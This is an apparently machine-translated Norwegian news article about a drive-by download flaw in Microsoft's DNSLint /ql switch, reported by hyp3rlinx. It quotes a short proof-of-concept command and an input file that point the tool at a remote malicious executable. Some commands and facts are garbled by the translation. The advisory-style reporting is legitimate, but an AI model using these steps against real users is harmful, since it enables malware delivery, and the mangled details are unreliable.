Logo no.nowadaytechnol.com

Microsofts DNSLint Utility QL Switch Kan Tillate At Eksterne Filer Lastes Ned

Microsofts DNSLint Utility QL Switch Kan Tillate At Eksterne Filer Lastes Ned
Microsofts DNSLint Utility QL Switch Kan Tillate At Eksterne Filer Lastes Ned

Video: Microsofts DNSLint Utility QL Switch Kan Tillate At Eksterne Filer Lastes Ned

Video: Microsofts DNSLint Utility QL Switch Kan Tillate At Eksterne Filer Lastes Ned
Video: Installing Microsoft Server 2019 in Hyper V & Domain joining a client (Silent Lesson) 2023, Oktober
Anonim
Image
Image

Microsoft DNSLint-verktøyet fungerer for å diagnostisere DNS-oppslagsproblemer (Domain Name System) relatert til IP-adressene som er tildelt forskjellige webservere som er tilgjengelige via nettleseren. Den er ikke inkludert som en del av den grunnleggende Windows-pakken, men kan lastes ned gratis fra Microsofts nettsted. sårbarhet for ekstern tilgang gradert 7.6 (kritisk) på CVSS 3.0-skalaen ble oppdaget å påvirke dette verktøyet som forårsaket tvungen stasjon ved nedlasting.

Sårbarheten stiger fra det faktum at DNSLint ikke vurderer domenenavn når man analyserer DNS-testfiler i henhold til “/ ql” -bryteren. I tilfelle en sluttbruker klarer å bruke en slik fil som inneholder skript eller binær kode i motsetning til den typisk forventede domenenavninformasjonen, kan systemet settes i fare der det blir enkelt å innføre tvangsnedlastinger. I tilfelle dette skjer, kan hacker presse for tvungen nedlasting av ondsinnet fil som kan laste ned og utføre eksterne kommandoer når du får tilgang til dem via nettleseren. Nedlastingen vil lagre til lokal systemplassering og rask sikkerhetstilgang, og siden filen kommer fra kjent sted på diskstasjonen, kan brukeren være tilbøyelig til å la den kjørbare filen fortsette. Når den ondsinnede filen er gitt privilegium, kan den kjøre hvilken som helst tiltenkt kode eksternt og kompromittere brukerens sikkerhet og personvern.

John Page fra hyp3rlinx har skrevet ut konseptbevis som simulerer dette sikkerhetsproblemet, og forklarer at en utilsiktet fil kan lastes ned i henhold til følgende når man bruker skript eller binær referansetekstfil i motsetning til domenenavnet:

dnslint.exe / v / y / d “MALWARE-FILE” / s X. X. X. X / r “myreport”

I sammenheng med DNSLint-verktøyet viser følgende hvordan sårbarheten kan utnyttes for å introdusere skadelig programvare i systemet.

1) “dnslint-update.exe” på ekstern webserverrot dir. 2) “servers.txt” DNSLint; Dette er eksempel på DNSLint-inndatafil + Denne DNS-serveren heter: dns1.cp.msft.net [dns ~ server] X. X. X. X, a, r; post X. X. X. X, ptr, r; PTR-post test1, cname, r; CNAME-post test2, mx, r; MX-post 3) dnslint.exe / ql servers.tx

Ovennevnte kode ble ikke endret som beskrevet av rettighetene til hyp3rlinx til dette innholdet. Å avsløre dette sikkerhetsproblemet, ser det ikke ut til at det er noen oppdateringer for å løse dette problemet foreløpig. CVE-kode skal fortsatt tildeles dette sikkerhetsproblemet, og det skal IDES og skrives på av Microsoft i sin offisielle sikkerhetsbulletin om saken.

Anbefalt: